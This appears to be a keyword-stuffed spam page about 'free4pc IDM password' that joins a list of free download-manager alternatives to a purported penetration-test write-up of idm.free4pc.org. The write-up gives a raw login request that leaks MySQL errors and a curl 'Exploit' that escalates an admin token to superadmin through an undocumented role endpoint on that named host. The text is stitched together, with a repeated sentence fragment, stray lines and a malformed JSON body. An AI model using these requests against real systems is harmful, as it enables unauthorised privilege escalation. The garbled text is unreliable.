POST /idm/login.php HTTP/1.1
Host: idm.free4pc.org
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=xyz123
username=admin@free4pc.org&password=invalid&csrf_token=abcd1234
Result: The server returns a MySQL error (SQLSTATE[HY000]: General error: 1366 Incorrect string value...) instead of a generic “Invalid credentials”. This reveals error‑based information leakage that can be leveraged for injection.
If you cannot afford IDM, these are safer and completely free:
| Software | Features | Platform | |----------|----------|----------| | XDM (Xtreme Download Manager) | Thread splitting, video grabbing, resume broken downloads | Windows, Linux, macOS | | Free Download Manager (FDM) | Torrent support, media preview, scheduler | Windows, macOS, Android | | Motrix | Clean UI, supports up to 10 threads, no ads | Windows, Linux, macOS | | uGet | Lightweight, clipboard monitoring, aria2 integration | Windows, Linux, macOS | free4pcorg+idm+password+work+top
All of these outperform any cracked version of IDM and receive regular security updates.
The IDM has a role hierarchy:
| Role | Permissions |
|------|-------------|
| user | View own profile |
| admin | Manage users, view logs |
| superadmin (or top) | Edit system config, add/remove IDM modules |
The admin role can edit user roles via the /admin/users/edit.php?id=<uid> page. However, the role dropdown only lists user and admin. POST /idm/login
Discovery: An undocumented POST endpoint (/api/v1/users/<uid>/role) accepts a JSON body:
"role": "superadmin"
When called with a valid admin JWT, the server updates the role without any validation (the UI simply hides the option). Result: The server returns a MySQL error (
Exploit:
curl -X POST -H "Authorization: Bearer $JWT" \
-H "Content-Type: application/json" \
-d '"role":"superadmin"' \
https://idm.free4pc.org/api/v1/users/1/role
Result: The admin user’s role changes to superadmin. Refresh the admin console – a new System Settings menu appears, confirming “top‑level” access.